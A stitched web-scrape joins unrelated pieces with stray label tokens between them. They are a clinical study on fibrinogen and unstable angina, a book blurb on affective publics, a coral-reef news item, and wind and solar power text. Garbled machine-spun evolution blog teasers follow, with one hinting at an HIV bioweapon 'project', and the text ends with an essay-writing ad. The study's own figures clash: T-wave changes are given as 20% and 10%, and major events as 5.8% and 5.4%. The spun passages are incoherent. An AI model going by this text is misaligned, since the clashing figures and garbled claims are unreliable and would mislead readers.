Our studyincludes a homogenous series of patients with pure unstable angina,excluding patients non-Q-wave infarct and high risk patients, andwith the requirement that dynamic changes had to be evident onelectrocardiogram (ECG) during the pain episode for the patient tobe included in the study; by using these criteria we attempted toreduce the possibility of including patients with non-coronarychest pain. Anti-thrombotic treatment consisted of theadministration of aspirin and enozaparin, and a conservativestrategy was followed with regard to cardiac catheterization. Thestudy aim was to evaluate the frequency of inpatient cardiac eventsand the predictors of same.
MATERIAL AND METHODS
Study group
From January 17,1999 to December 18, 2001, 246 consecutive patients were admittedto our hospital with the diagnosis of unstable angina, according tothe following criteria: a) anginous chest pain at rest; b) dynamic electrocardiographic changes during the painepisode; c) normal CK-MB values (acute myocardial non-Q-waveinfarct was excluded), and d) the absence of a history ofacute myocardial infarct for 30 days previously (post-infarctangina excluded). For inclusion in the study, an ECG was requiredduring the pain episode that showed signs suggestive of ischemia,such as depression or elevation of the ST segment=0.1 mV, orinversion of the T-wave=0.1 mV. The CK-MB was determined upon thepatient´s arrival in the emergency room, and at 8, 12, 18 and24 hours after initiation of the pain, and in all cases the valuewas less than the upper limit of normal according to the protocolof our hospital (CK-MB activity <6% of total CK).
Treatment protocol
Upon admission,all patients received treatment with aspirin, enoxaparin (1mg/kg/12 hours), intravenous nitroglycerine, and beta-blockers orcalcium antagonists. In no case were IIb-IIIa receptor antagonistsadministered. For patients with an ST segment elevation, thisrapidly dropped (in less than 20 minutes) with the administrationof nitroglycerine, and therefore no patient required fibrinolitictreatment.
Analysis
Forty-eighthours after admission (range 24 to 72 hours) routine analysis,including fibrinogen analysis, was performed. In order to determinethe fibrinogen level, blood was collected with sodium citrate at aratio of 1:10. The sample was processed by the coagulant formationtechnique in an automatic coagulometer, and measurements were madeby the optical method. The variation coefficient for our laboratoryis less than 10%.
Indications for cardiac catheterization
The initialattitude was conservative. Thus, coronary angiography andrevascularization (if anatomically possible) were indicated withoutprevious stress test only in the case of recurrent angina despitemedical treatment. Before discharge, those patients stabilized withmedical treatment underwent a symptom-limited stress test accordingto the Bruce protocol, and patients with Bruce stage I-II ischemiawere selected to undergo coronary angiography.
Collection of clinical data
Coronary riskfactors and a history of ischemic heart disease and cardiac surgerywere noted in the clinical history. During hospital admission thefollowing episodes were made note of: a) recurrent angina,defined by recurrent chest pain with transitory changes on ECG butwithout CK-MB elevation; b) the need for cardiaccatheterization, and c) a major episode, defined by acutemyocardial infarct (recurrent chest pain with CK-MB elevation) ordeath.
Statistical analysis
Quantitativevariables were expressed as mean ±standard deviation (SD)and were compared by the ANOVA test. Qualitative variables wereexpressed as percentages and were compared by the χ² test. Relativerisk (RR) was determined with confidence intervals (CI) of 95%. Thebest cut-off points for the quantitative fibrinogen value thatpredicted the risk of episodes was determined by using receiveroperator characteristic (ROC) curves. Multivariate analyses wereperformed by binary logistical regression analysis, and we includedthose variables that on univariate analysis showed a value of P<.1; the odds ratio (OR) and 95% CI werecalculated.
In all cases P<.05 was considered significant. For statistical analysis,the SPSS 9.0 (Chicago, Illinois) statistical package wasused.
RESULTS
Population characteristics
Table 1 showsthe population characteristics of patients included in the study.Mean age was 67±10 years.
The initialchanges on ECG that justified inclusion in the study were anisolated T-wave inversion in 50 patients (20%) and deviation in theST segment in 196 (80%), 146 with an ST segment decline (60%) and50 with an ST segment increase (20%).
Episodes during hospital admission
Eighty-eightpatients (36%) presented with recurrent angina, and 14 patients(5.8%) with major cardiac events, 8 with non-fatal acute myocardialinfarct, and 6 patients died. Cardiac catheterization was performedon 142 patients (58%), coronary angioplasty was indicated in 60patients (24%), and cardiac surgery was indicated in 32 patients(13%). One infarct and 1 death occurred following angioplasty, and2 deaths occurred following surgery; the remaining 10 majorepisodes occurred before cardiac catheterization. One deathoccurred in the first 24 hours following admission, before a bloodsample could be obtained to determine the fibrinogenlevel.
Predictors of episodes
Table 2 showsthe predictors of current angina by means of univariate analysis.Recurrent angina occurred more frequently in patients with ahistory of ischemic heart disease (41% vs 31%; P=.1; RR=1.5;95% CI, 0.9 to 2.6), a history of cardiac surgery (83% vs 33%; P=.001; RR=10.0; 95% CI, 2.1 to 46.7), ST segment deviation(41% vs 14%; P=.0001; RR=4.3; 95% CI, 1.9 to 10.1), and ahigher fibrinogen level (5.2 g/L±1.8 g/L vs 4.4g/L±1.4 g/L; P=0.001, RR=1.4, 95% CI, 1.1-1.7). Bymultivariate analysis (including the variables of history ofischemic heart disease, history of heart surgery, deviation of STsegment, and fibrinogen level), history of heart surgery(P=0.004, OR=22; 95% CI, 3 to 182), ST segment change(P=.01; OR=4.7; 95% CI, 1.4 to 15.9), and fibrinogen level(P=.009; OR=2.4; 95% CI, 1.3 to 4.6) were independentpredictors. The area below the ROC curve for the fibrinogen levelthat predicted recurrent angina was 0.63±0.04(P=0.004), and the best cut-off point for a fibrinogen levelpredictor was ≥4.5 g/L (43% vs 26%; P=.02; RR=2.1; 95%CI, 1.2 to 3.9).
Table 3 presentsthe variables related to the need for cardiac catheterization onunivariate analysis. A history of heart surgery (92% vs 56%; P=.02; RR=8.6; 95% CI, 1.1 to 68.3) and a higher fibrinogenlevel (4.9 g/L±1.5 g/L vs 4.3 g/L±1.5 g/L; P=.009; RR=1.3; 95% CI, 1.1 to 1.6) significantly increased theprobability of the need for cardiac catheterization. Onmultivariate analysis (including the variables of a history ofheart surgery and increased fibrinogen), a higher fibrinogen level(P=.01; OR=2.1; 95% CI 95%, 1.2 to 3.9) was the onlyindependent predictor variable. The fibrinogen level in the areabelow the ROC curve that predicted the need for cardiaccatheterization was 0.61±0.04 (P=.007), and the bestcut-off point for a predictor fibrinogen value was ≥4.5 g/L (66%vs 50%; P=.03; RR=2.0; 95% CI, 1.1 to 3.6).
Major events(Table 4) were only related to a higher fibrinogen value (6.7g/L±1.8 g/L vs 4.6±1.5 g/l; P=.001; RR=2.0;95% CI, 1.4-3.1), although there was a non-significant tendencytoward more major events in those patients with an ST segmentdeviation (6.6% vs 2.0%; P=.2). The area below the ROC curvefor fibrinogen as a predictor of a major episode was0.83±0.07 (P=.001), and the best cut-off point was afibrinogen value ≥5 g/L (10.8% vs 1.6%; P=.007; RR=7.7;95% CI, 5-38.7).
Predictive value of fibrinogen
The study groupwas divided into fibrinogen quartiles (<3.5, 3.5-4.3, 4.4-5.5,>5.6 g/L) (Figure 1). When the fibrinogen level increased, wenoted a progressive increase in the rate of recurrent angina (23%,27%, 30%, and 50%; P=.02; RR of the fourth vs the firstquartile =3.3; 95% CI, 1.3 to 8.1; P=.01), the need forcatheterization (35%, 58%, 61%, and 66%; P=.02; RR of thefourth quartile vs the first quartile =3.6; 95% CI, 1.5 to 8.5; P=.004), and major episodes (0%, 2%,1%, 4.5%, and 12%; P=.04; RR of the fourth quartile vs the first quartile =2.0;95% CI, 1.6 to 2.4; P=0.03).
Fig.1. Division of thestudy population into quartiles by fibrinogen values (<3.5,3.5-4.3, 4.4-5.5, >5.6 g/L). When the fibrinogen levelincreased, a progressive increase in the rate of recurrent anginawas observed (23%, 27%, 30%, and 50%; P=.02; RR of thefourth quartile vs the first quartile =3.3; 95% CI, 1.3 to 8.1; P=.01), the need for catheterization (35%, 58%, 61%, and 66%;P=.02; RR of the fourth quartile vs the first quartile =3.6;95% CI, 1.5 to 8.5; P=.004), and major episodes (0%, 2.1%,4.5%, and 12%; P=.04; RR of the fourth quartile vs the firstquartile =2.0; 95% CI, 1.6 to 2.4; P=.03).
DISCUSSION
The principalfindings of our study were as follows: a) the hospitalcourse of patients with unstable angina with dynamicelectrocardiographic changes who are initially treatedconservatively is complicated by a high rate of cardiac episodessuch as recurrent angina in 36% of cases, the need forcatheterization in 58%, and major episodes in 5.4%, and b)elevation of fibrinogen levels is associated with all unfavorableepisodes, while a history of cardiac surgery and a decline in theST segment during the pain episode is associated with recurrentangina.
Natural history of unstable angina
The history ofunstable angina varies from one study to another as a function ofthe inclusion criteria used. Our series analyzed patients withhigh-risk unstable angina by requiring the presence of dynamicelectrocardiographic changes during the pain episode for patientinclusion in the study. In other studies, documentation ofelectrocardiographic changes during the episode of chest pain wasnot a requirement for inclusion of patients;11-14eliminating this requirement may result in the inclusion oflower-risk patients or of patients with non-coronary chest pain. Onthe other hand, we excluded patients with non-Q-wave infarct. Otherseries group together unstable angina and non-Q-waveinfarct.1-8,15 Although theoretically both entitiesshare the same pathogenesis, which consists of serious coronarystenosis without occlusion and with no or a small amount ofmyocardial necrosis,18-20 could produce extensiveinfarcts, in spite of Q-waves not being observed on surface ECG, aprognostic implication that is clearly different from that of pureunstable angina without necrosis or with minimalnecrosis.
Our studyfinding of a rate of 36% for recurrent angina during admission isgreater than that reported in other series.1,3,21 Osleret al1 found a rate of 17% for recurrent angina onmeta-analysis that included studies of unstable angina ornon-Q-wave infarct treated with aspirin and intravenous heparin. Inthe ESSENCE study,3 the rate of inpatient recurrentangina was 13% in the subgroup treated with aspirin and enoxaparin(the same treatment regimen as in our study). The differences areexplained by the inclusion criteria used. Therefore, our patientpopulation would be very much exposed to recurrent ischemia, as thedynamic electrocardiographic changes without enzyme elevation wouldindicate serious ischemia and a myocardium at risk withoutnecrosis.
In spite of thehigh incidence of recurrent angina, the frequency of majorinpatient episodes is similar to3,15 or lowerthan1,4,5 that of other series that also includedsubgroups of patients treated with aspirin and subcutaneous orintravenous heparin. Probably the exclusion of patients withnon-Q-wave infarct and post-infarct angina, on one hand, and theavailability of a hemodynamic laboratory for urgent catheterizationin the case of recurrent angina on the other, would justify thisrelatively lower incidence of major episodes in comparison with thehigh rate of recurrent angina.
History of heart surgery
In spite of thefact that our study only included 12 patients with a history ofheart surgery, this variable was a potent predictor of recurrentangina and the need for cardiac catheterization. Eighty-threepercent of patients with a history of heart surgery presented withrefractory angina and 92% required catheterization. These datasuggest the usefulness of a strategy of routine catheterization incases of unstable angina with a previous history of anaortocoronary graft, although the possibility of successfulrevascularization are limited in these patients.22 Ahistory of heart surgery was not related to the occurrence of majorepisodes, probably due to the limited number of patients includedin our study.
Dynamic ECG changes
The dynamic ECGchanges recorded in our study were a decrease in ST segment in 60%of patients, an increase in ST segment in 20% of patients, andisolated T-wave inversion in the remaining 10% of patients. Datapublished in other studies shows a greater proportion of T-wavechanges. Thus, in the TRIM study,23 in the subgroup thatpresented with electrocardiographic changes, in 29% of patientsthere was an increase in the ST segment, 18% had a decrease in STsegment, and 53% had T-wave inversion. In the ESSENCEstudy,3 of the subgroup of patients withelectrocardiographic changes who were treated with enoxaparin, 10%showed an increase in the ST segment, 33% showed a decrease in theST segment, and 57% showed T-wave changes, although in this studythe subcategories of patients as a function of ECG were notmutually exclusive.
In our series,changes in the ST segment increased the probability of recurrentangina in comparison with T-wave changes. In series that included60%23 and 28%24 of patients withoutelectrocardiographic changes, the deviation of the ST segm ent wasassociated with recurrent ischemia, while T-wave inversion had nopredictive value. The ST segment changes have also been related tothe occurrence of major episodes,25-27 although we onlyfound a tendency that did not reach statistical significance. Twofactors could explain the lack of statistical significance: a) the exclusion of patients with non-Q-wave infarcts andpost-infarct angina, and b) the low rate of major episodesthat limited the statistical power of the analysis of itspredictors.
Fibrinogen
AN increasedfibrinogen level is a predictor of a poor prognosis for patientswith unstable angina and non-Q-wave myocardialinfarct.28-31 The relationship of various risk factorsto fibrinogen has been described, such as age, smoking, obesity, asedentary lifestyle, diabetes, and arterialhypertension.32 Nevertheless, after adjustment for theprincipal risk factors, fibrinogen remained an independent riskfactor for acute myocardial infarction and death in patients withischemic heart disease.33 In our study, elevation offibrinogen levels increased the probability of all unfavorableinpatient episodes, independently of coronary risk factors, and wasthe only variable associated with major cardiac events. Threemechanisms may explain the relationship between fibrinogen and apoor prognosis:29 a) a marker for a state ofhypercoagulability that favors coronary thrombosis; b) acutephase reactant due to a high inflammatory reaction in theatheromatous plaque of a coronary vessel, and c) an acutephase reactant due to myocardial damage. Given that we excludedpatients with non-Q-wave infarcts, this last mechanism does notappear to be the culprit in our study.
Clinical implications
Currently, thereis controversy regarding whether to follow a conservative orinterventionist strategy in the treatment of patients with unstableangina and non-Q-wave infarcts.6-9 In our series,cardiac catheterization was performed in 58% of patients, in spiteof an initially conservative treatment strategy. This data suggeststhat in high-risk unstable angina, defined by dynamicelectrocardiographic changes, routine catheterization uponadmission may be appropriate, at least for the subgroup of patientswith markers for a poor prognosis during their hospital course: ahistory of heart surgery, ST segment changes on the initial ECG,and an increase in fibrinogen value.
Limitations
When we beganour study, determination by means of troponin testing was notavailable in our hospital. Therefore, patients with non-Q-waveinfarcts were excluded via CK-MB values. If there a troponin testhad been available, some patients might possibly have been placedin the category of «micro infarct,» or infarct per thenew definition of acute myocardial infarct.34 Similarly,obtaining samples for the determination of fibrinogen values wasnot homogenous with respect to the time of hospital admission, andthere was a range of 24 to 72 hours from the time of admission tothe extraction of blood for the sample.
Correspondence: Dr. J. Sanchis Forés.
Servei de Cardiologia. Hospital Clínic Universitàri. Blasco Ibáñez, 17. 46010 València.España. E-mail: [email protected]
|
__label__pos
| 0.588603
|
To understand the profound changes in the modes of public political debate over the past decade, this volume develops a new conception of public spheres as spaces of resonance emerging from the power of language to affect and to ascribe and instill collective emotion.
Political discourse is no longer confined to traditional media, but increasingly takes place in fragmented and digital public spheres. At the same time, the modes of political engagement have changed: discourse is said to increasingly rely on strategies of emotionalization and to be deeply affective at its core. This book meticulously shows how public spheres are rooted in the emotional, bodily, and affective dimensions of language, and how language – in its capacity to affect and to be affected – produces those dynamics of affective resonance that characterize contemporary forms of political debate. It brings together scholars from the humanities and social sciences and focuses on two fields of inquiry: publics, politics and media in Part I, and language and artistic inquiry in Part II. The thirteen chapters provide a balanced composition of theoretical and methodological considerations, focusing on highly illustrative case studies and on different artistic practices.
The volume is an indispensable source for researchers and postgraduate students in cultural studies, literary studies, sociology, and political science. It likewise appeals to practitioners seeking to develop an in-depth understanding of affect in contemporary political debate.
1. Introduction: Public Spheres of Resonance – Constellations of Affect and Language
Anne Fleig, Christian von Scheve
2. It’s the Language, stupid!
Kathrin Röggla
Part I: Publics, Politics and Media
3. Affective Publics: Understanding the Dynamic Formation of Public Articulations Beyond the Public Sphere
Margreth Lünenborg
4. Resonant networks
Susanna Paasonen
5. A Sentimental Contract: Ambivalences of Affective Politics and Publics
Brigitte Bargetz
6. Rhythm, gestures and tones in public performances: Political mobilization and affective communication
Britta Timm Knudsen
7. Affective Dynamics of Public Discourse on Religious Recognition in Secular Societies
Christian von Scheve, Robert Walter-Jochum
Part II: Language and Artistic Practice
8. Put A Spell on You: Affect, Language and the Non-Linguistic
Anna Gibbs
9. German 'Sprechtheater' and the Transformation of Theatrical Public Spheres
Friederike Oberkrome, Hans Roth, Matthias Warstat
10.
The Alphabet of Feeling Bad: Environmental Installations and Sensory Publics
Ann Cvetkovich
11. Affect and Accent: Public Spheres of Dissonance in the Writing of Yoko Tawada
Marion Acker, Anne Fleig, Matthias Lüthjohann
12. Affect(ive) Assemblages: Literary Worldmaking in Fatma Aydemir’s Ellbogen
Claudia Breger
13. Theory’s Affective Scene: Or, What to Do with Language after Affect
Michael Eng
The Routledge Studies in Affective Societies book series presents high-level academic work on the social dimensions of human affectivity. It aims at shaping, consolidating and promoting a new understanding of societies as
Affective Societies, accounting for the fundamental importance of affect and emotion for human coexistence in the mobile and networked worlds of the twenty-first century. Series Editors:
Birgitt Röttger-Rössler is Professor of Social and Cultural Anthropology at Freie Universität Berlin, Germany [email protected]
Doris Kolesch is Professor of Theater and Performance Studies at Freie Universität Berlin, Germany [email protected]
Editorial Board:
Professor Jan Slaby, Professor Christian von Scheve, Professor Hubert Knoblauch, Dr. Kerstin Schankweiler, Dr. Katharina Metz
Routledge Editor:
Emily Briggs [email protected]
|
__label__pos
| 0.803151
|
Coral reefs in the deep are ecologically different than those in shallow water
L.A. Rocha/California Academy of Sciences
Deep water reefs are unlikely to be safe harbors for many fish and coral species from shallow reefs threatened by climate change and human activity. Shallow water creatures may have trouble adapting to conditions in the deep, scientists report in the July 20
Science. Plus, deep reefs are facing the same threats that are putting shallower ones at risk.
The study deals a blow to the “deep reef refugia” hypothesis. That’s the idea that species from troubled shallow reefs could simply move to reefs at depths of 30 to 150 meters, called mesophotic reefs because they exist at the limits of where sunlight reaches. Even though individuals of a typical shallow water species may be spotted at a wide range of depths, it doesn’t mean the majority of that species could survive living in deeper waters, says study coauthor Luiz Rocha, a zoologist at the California Academy of Sciences
|
__label__pos
| 0.939567
|
Cyril Richardson and his family witnessed two Category 5 hurricanes in the course of two weeks. They weathered it safely, but like thousands of other Virgin Island residents, they found themselves without power and with no real hope of having it restored for months. With the help of our solar experts, Cyril settled on our popular off-grid system, The Ranch. At GE, product evolution is at our core, and we are continuously working to develop the next generation of wind energy. Beginning in 2002 with one wind turbine model, we now offer a full suite of turbines created for a variety of wind environments. We offer increased value to customers with proven performance, reliability, and availability. Our portfolio of turbines feature rated capacities from 1.7 MW to 5.3 MW (Onshore) and 6 MW to 12 MW (Offshore), we are uniquely suited to meet the needs of a broad range of wind regimes. Concentrator photovoltaics (CPV) systems employ sunlight concentrated onto photovoltaic surfaces for the purpose of electrical power production. Contrary to conventional photovoltaic systems, it uses lenses and curved mirrors to focus sunlight onto small, but highly efficient, multi-junction solar cells. Solar concentrators of all varieties may be used, and these are often mounted on a solar tracker in order to keep the focal point upon the cell as the sun moves across the sky.[147] Luminescent solar concentrators (when combined with a PV-solar cell) can also be regarded as a CPV system. Concentrated photovoltaics are useful as they can improve efficiency of PV-solar panels drastically.[148] The Stirling solar dish combines a parabolic concentrating dish with a Stirling engine which normally drives an electric generator. The advantages of Stirling solar over photovoltaic cells are higher efficiency of converting sunlight into electricity and longer lifetime. Parabolic dish systems give the highest efficiency among CSP technologies.[18] The 50 kW Big Dish in Canberra, Australia is an example of this technology.[14] Other renewable energy technologies are still under development, and include cellulosic ethanol, hot-dry-rock geothermal power, and marine energy.[156] These technologies are not yet widely demonstrated or have limited commercialization. Many are on the horizon and may have potential comparable to other renewable energy technologies, but still depend on attracting sufficient attention and research, development and demonstration (RD&D) funding.[156]
There is more trouble with rated power: It only happens at a “rated wind speed”. And the trouble with that is there is no standard for rated wind speed. Since the energy in the wind increases with the cube of the wind speed, it makes a very large difference if rated power is measured at 10 m/s (22 mph), or 12 m/s (27 mph). For example, that 6 meter wind turbine from the previous section could reasonably be expected to produce 5.2 kW at 10 m/s, while it will do 9 kW at 12 m/s!
Responsible development of all of America’s rich energy resources -- including solar, wind, water, geothermal, bioenergy & nuclear -- will help ensure America’s continued leadership in clean energy. Moving forward, the Energy Department will continue to drive strategic investments in the transition to a cleaner, domestic and more secure energy future. Solar electricity is inherently variable and predictable by time of day, location, and seasons. In addition solar is intermittent due to day/night cycles and unpredictable weather. How much of a special challenge solar power is in any given electric utility varies significantly. In a summer peak utility, solar is well matched to daytime cooling demands. In winter peak utilities, solar displaces other forms of generation, reducing their capacity factors.
What is a small wind turbine? Anything under, say, 10 meters rotor diameter (30 feet) is well within the “small wind” category. That works out to wind turbines with a rated power up to around 20 kW (at 11 m/s, or 25 mph). For larger wind turbines the manufacturers are usually a little more honest, and more money is available to do a good site analysis. The information in this article is generic: The same applies to all the other brands and models, be they of the HAWT (Horizontal Axis Wind Turbine) or VAWT (Vertical Axis Wind Turbine) persuasion.
The time will arrive when the industry of Europe will cease to find those natural resources, so necessary for it. Petroleum springs and coal mines are not inexhaustible but are rapidly diminishing in many places. Will man, then, return to the power of water and wind? Or will he emigrate where the most powerful source of heat sends its rays to all? History will show what will come.[35] Wind turbines need wind. Not just any wind, but the nicely flowing, smooth, laminar kind. That cannot be found at 30 feet height. It can usually not be found at 60 feet. Sometimes you find it at 80 feet. More often than not it takes 100 feet of tower to get there. Those towers cost as much or more, installed, as the turbine itself. How much tower you need for a wind turbine to live up to its potential depends on your particular site; on the trees and structures around it etc. Close to the ground the wind is turbulent, and makes a poor fuel for a small wind turbine.
Our latest innovation in the Industrial Internet era, The Digital Wind Farm, is making our turbines smarter and more connected than ever before. A dynamic, connected and adaptable wind energy ecosystem, the Digital Wind Farm pairs our newest turbines with a digital infrastructure, allowing customers to connect, monitor, predict and optimize unit and site performance.
The market for renewable energy technologies has continued to grow. Climate change concerns and increasing in green jobs, coupled with high oil prices, peak oil, oil wars, oil spills, promotion of electric vehicles and renewable electricity, nuclear disasters and increasing government support, are driving increasing renewable energy legislation, incentives and commercialization.[10] New government spending, regulation and policies helped the industry weather the 2009 economic crisis better than many other sectors.[24][197] The tables above are for HAWTs, the regular horizontal “wind mill” type we are all familiar with. For VAWTs the tables can be used as well, but you have to convert their dimensions. Calculate the frontal area (swept area) of the VAWT by multiplying height and width, or for a curved egg-beater approximate the area. Now convert the surface area to a diameter, as if it were a circle: Diameter = √(4 • Area / Pi). That will give you a diameter for the table. Look up the energy production for that diameter and your average annual wind speed and do the following: On most horizontal wind turbine farms, a spacing of about 6–10 times the rotor diameter is often upheld. However, for large wind farms distances of about 15 rotor diameters should be more economical, taking into account typical wind turbine and land costs. This conclusion has been reached by research[62] conducted by Charles Meneveau of the Johns Hopkins University,[63] and Johan Meyers of Leuven University in Belgium, based on computer simulations[64] that take into account the detailed interactions among wind turbines (wakes) as well as with the entire turbulent atmospheric boundary layer. Photovoltaic systems use no fuel, and modules typically last 25 to 40 years. Thus, capital costs make up most of the cost of solar power. Operations and maintenance costs for new utility-scale solar plants in the US are estimated to be 9 percent of the cost of photovoltaic electricity, and 17 percent of the cost of solar thermal electricity.[71] Governments have created various financial incentives to encourage the use of solar power, such as feed-in tariff programs. Also, Renewable portfolio standards impose a government mandate that utilities generate or acquire a certain percentage of renewable power regardless of increased energy procurement costs. In most states, RPS goals can be achieved by any combination of solar, wind, biomass, landfill gas, ocean, geothermal, municipal solid waste, hydroelectric, hydrogen, or fuel cell technologies.[72] On most horizontal wind turbine farms, a spacing of about 6–10 times the rotor diameter is often upheld. However, for large wind farms distances of about 15 rotor diameters should be more economical, taking into account typical wind turbine and land costs. This conclusion has been reached by research[62] conducted by Charles Meneveau of the Johns Hopkins University,[63] and Johan Meyers of Leuven University in Belgium, based on computer simulations[64] that take into account the detailed interactions among wind turbines (wakes) as well as with the entire turbulent atmospheric boundary layer. In cases of self consumption of the solar energy, the payback time is calculated based on how much electricity is not purchased from the grid. For example, in Germany, with electricity prices of 0.25 €/kWh and insolation of 900 kWh/kW, one kWp will save €225 per year, and with an installation cost of 1700 €/KWp the system cost will be returned in less than seven years.[91] However, in many cases, the patterns of generation and consumption do not coincide, and some or all of the energy is fed back into the grid. The electricity is sold, and at other times when energy is taken from the grid, electricity is bought. The relative costs and prices obtained affect the economics. In many markets, the price paid for sold PV electricity is significantly lower than the price of bought electricity, which incentivizes self consumption.[92] Moreover, separate self consumption incentives have been used in e.g. Germany and Italy.[92] Grid interaction regulation has also included limitations of grid feed-in in some regions in Germany with high amounts of installed PV capacity.[92][93] By increasing self consumption, the grid feed-in can be limited without curtailment, which wastes electricity.[94] Features:Human-friendly design, easy to install and maintain.Patented generator, low torque at start-up, high conversion rate.Low start-up speed, high wind power utilization, low vibration and low noise.Automatically adjust wind direction, high cost-performance. The use of high temperature Teflon wire, die-casting aluminum for the shell material of the generator.Blade built-in copper inserts, bolts will not damage when the nylon fiber damage, it is not e. The Sunforce 44444 400 Watt Wind Generator uses wind to generate power and run your appliances and electronics. Constructed from lightweight, weatherproof cast aluminum, this generator is also a great choice for powering pumps or charging batteries for large power demands. With a maximum power up to 400 watts or 27 amps, this device features a fully integrated regulator that automatically shuts down when the batteries are completely charged. The 44444 is virtually maintenance free with only two moving parts, and the carbon fiber composite blades ensure low wind noise while the patented high wind over speed technology guarantees a smooth, clean charge. Assembly is required, but this generator installs easily and mounts to any sturdy pole, building, or the Sunforce 44455 Wind Generator 30-Foot Tower Kit. The 44444 uses a 12-volt battery (not included) and measures 27 x 44 x 44 inches (LxWxH) A solar cell, or photovoltaic cell (PV), is a device that converts light into electric current using the photovoltaic effect. The first solar cell was constructed by Charles Fritts in the 1880s.[5] The German industrialist Ernst Werner von Siemens was among those who recognized the importance of this discovery.[6] In 1931, the German engineer Bruno Lange developed a photo cell using silver selenide in place of copper oxide,[7] although the prototype selenium cells converted less than 1% of incident light into electricity. Following the work of Russell Ohl in the 1940s, researchers Gerald Pearson, Calvin Fuller and Daryl Chapin created the silicon solar cell in 1954.[8] These early solar cells cost 286 USD/watt and reached efficiencies of 4.5–6%.[9]
|
__label__pos
| 0.675659
|
International group of scientists in Georgia have been found
fossils that show that several species of early human ancestor belong to the same species Homo erectus .This conclusion was made by anthropologists from Israel, Georgia , United States and Switzerland , after a study of skulls that were found in a small town in southern Georgia .
In addition to the skull , the age of which 1.8 million years old, were found and other remains of ancient man and bones of extinct animals . Discovered discoveries forced scientists to rethink views on
human evolution in Africa.
Continue reading “The generally accepted theory of human evolution”
Paul and Anne Ehrlich, the famous American
biologists believe that we must first give all women equal rights with men. In particular, this means free contraceptives and abortion. All civilizations eventually crisis. The result was different: some completely disappeared, while others eventually revived. But never has the catastrophe threatening the whole of mankind.
Famous American
biologists Paul and Anne Ehrlich are two factors that lead to the collapse: overpopulation and over consumption. And he and other deceptive. Quite a long time it may seem that the more hands and the more active the market, the rapid scientific and technological progress, and the better we live. But in the end we are left with nothing- the natural systems can not withstand voltage, and the hour of reckoning. Continue reading “How to prevent the loss of human evolution?”
About two million years ago in what is Olduvai Gorge dramatically
changed climate: drought alternated with wet periods. The researchers suggest that this may have influenced the evolution of human ancestors.
Scientists examined sediments that formed in a long time in the lakes of Olduvai Gorge. Tracked how changes in sediment over time the composition of organic wax that covers the leaves of plants, scientists have concluded that the local ecosystem there were sharp fluctuations in climate. Continue reading “Human evolution ancestors associated with abrupt change of climate”
Forensic techniques Australian anthropologist reconstructed face florescent mysterious man. Homo florescent was discovered on the Indonesian island of Flores in 2003 and caused a heated debate.
Some believe that this is a completely new look, while others view him as a representative of already known species, but with some variations Susan Hayes to work hard for the police, so that muscle and fat to stick to model her skull was not difficult. She got a surprisingly familiar
face with high cheekbones, long ears and a wide nose. Continue reading “Human face evolution”
Dinosaur with a spiked head that roam Canada 78 million years ago, was the oldest horned reptile, found in North America.
Herbivore named Xenoceratops foremostensis, which translated from Latin means “Foremost of rogatolitsy alien” (that is, a small town near which in 1958 found the first fossils).
Like its more famous relative Triceratops, who lived 15 million years later, in the last days of the
dinosaurs, ksenotseratops kopepodobnye had long horns sticking straight from the forehead, and a thyroid collar, formerly continuation skull. However, in contrast to the triceratops, the ksenotseratopsa were also horns on his collar. Continue reading “Horned dinosaurs has shed light on the evolution”
The human species and leading to an
evolutionary leap. For thousands of years different cultures around the world have been attributed to the sun a special role. It is remarkable how he was revered by some civilizations that reached high levels of cultural development in the past, like the Egyptian, where he was revered as a god (Ra and Aton), or maya, that deified him with the name of Kinich Ahau, or the Inca worshiped him as Inti.
All these people were in the
sun more than a celestial object. For them it was the very divinity manifested to men. For this reason was the object of worship. One might think that this spiritual identification with a giant-sized fireball was a superstition born of scientific ignorance. Continue reading “Spiritual evolution”
Later than medical wars, Athens, proud of his beauty and rich for his conquests, shone with extraordinary splendor. This is the time when we are offered the most perfect picture of Greek life.
The welfare and happiness of the home, very little attention was called Greek. Corno most of the south, he spent his days away from home, engaged in business, in the exercises, in politics and in the ceremonies. He lived not for his family, but for the city. The luxury of this was his pride was satisfied personally with a simple and modest life, provided that public monuments and festivals of their gods provoke universal admiration.
Continue reading “Athenian evolution”
The history of biological warfare (BW) can be divided into three parts ancient history, modern history and what we call “this”. Ancient history begins far beyond what we think a priori and lasts until the end of the twentieth century. Just to give an example, the first documented use of biological warfare dates back to Roman times that used animal carcasses to contaminate enemy water supplies. At that time the idea was behind this kind of attack was a weakened enemy is an enemy easy to defeat … Since then and until now have been many changes, and far-reaching. To explain the modern history and present, need to continue this article, it is interesting to focus our attention on the movements of the United States, and their universal impact in the last 50 years especially in politics.
Continue reading “Biological warfare and its evolution: the HIV project”
Geological studies have convincingly shown that during the existence of Australopithecus the Earth’s climate became drier, rain forests retreated. Australopithecus dangers lurking in the open, treeless areas. They needed to get food, including hunting. The lack of strong claws, teeth, sufficient muscle power has led to the unique achievements, namely the use of stone, sticks as a means of protection and tools.
All this is in some way affected their evolution. As shown by finding parts of the skeleton, australopithecines are similar in structure to man a number of body parts. They moved on two legs. Over time, they are more adapted to a changing environment. Thus, the anthropoids, fossil apes, united in groups, herds, the first guns used: stones, sticks for defense and obtaining food. But what kind of food? Continue reading “Human-Path of evolution”
With biologists published a review of the popular “The evidence of evolution. It examines the main groups of data on which the global scientific community considers biological evolution is firmly established fact. This publication is a response to the activation of creationist propaganda, which is forcing scientists again and again to justify the proven truth. The authors call for believers to be reconciled with science and hope that the submitted review will be a useful tool for those who value knowledge as opposed to hypnotic suggestion creationist propagandists, wrote Elect
Continue reading “Evidence of evolution”
|
__label__pos
| 0.811109
|
Cause and Impact Essay: How Exactly To Write? Easier Versus You Would Imagine!
Cause and Impact Essay: How Exactly To Write? Easier Versus You Would Imagine!
It is almost always simple for visitors to comprehend cause-effect relationships. a pupil who’s got perhaps maybe maybe not done their research realizes that this could bring about some type of penalty. Cause and essay that is effect a scholastic as a type of composing that aims at making clear relationships that are cause-effect this 1 in a way that tells how one occasion contributes to another occasion. Although United Statesstudents learn to write effect and cause essays in high schools and Colleges, skills they gain even serve them well if they pursue greater Transition or education to workplace. Take a good look at content that follows To find out more about effect and cause essays, their company habits, and purposes they satisfy.
What exactly is and exactly exactly How It varies off their Essays kinds
